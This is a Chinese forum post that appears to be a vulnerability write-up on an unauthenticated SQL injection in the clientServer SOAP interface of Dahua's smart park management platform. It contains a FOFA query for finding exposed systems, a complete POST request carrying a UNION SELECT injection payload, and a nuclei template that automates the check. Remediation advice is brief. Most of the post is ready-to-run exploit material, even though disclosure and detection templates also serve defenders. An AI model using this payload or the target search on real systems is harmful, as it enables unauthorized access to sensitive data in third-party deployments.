大华智慧园区综合管理平台clientServer存在SQL注入漏洞
大华智慧园区综合管理平台clientServer存在SQL注入漏洞
漏洞描述
大华智慧园区综合管理平台clientServer接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。未授权攻击者可利用此漏洞获取敏感信息。
产品界面
fofa语法
app="dahua-智慧园区综合管理平台"
POC
POST /portal/services/clientServer HTTP/1.1Host:User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: text/xml;charset=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com"><soapenv:Header/><soapenv:Body><cli:getGroupInfoListByGroupId><!--type: string--><arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0><!--type: long--><arg1>10</arg1></cli:getGroupInfoListByGroupId></soapenv:Body></soapenv:Envelope>
nuclei验证
id: dahua-WPMS-clientServer-sqlinfo:name: 大华智慧园区综合管理平台clientServer存在SQL注入漏洞author: nobodyseverity: highdescription: |大华智慧园区综合管理平台clientServer接口处未对用户的输入进行过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。未授权攻击者可利用此漏洞获取敏感信息。impact: |未授权攻击者可利用此漏洞获取敏感信息。remediation: |升级版本,打补丁metadata:verified: truemax-request: 3fofa-query: app="dahua-智慧园区综合管理平台"tags: dahua,sqlrequests:- raw:- |POST /portal/services/clientServer HTTP/1.1Host: {{Hostname}}User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Content-Type: text/xml;charset=UTF-8<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com"><soapenv:Header/><soapenv:Body><cli:getGroupInfoListByGroupId><!--type: string--><arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0><!--type: long--><arg1>10</arg1></cli:getGroupInfoListByGroupId></soapenv:Body></soapenv:Envelope>matchers:- type: dsldsl:- status_code == 200 && contains_all(body,"e10adc3949ba59abbe56e057f20f883e")
修复建议
- 建议升级到最新版本或打补丁
- 输入做严格过滤
打赏我,让我更有动力~
0 条回复
|
直到 1个月前 |
146 次浏览
登录后才可发表内容
返回:技术文章投稿区
漏洞文章
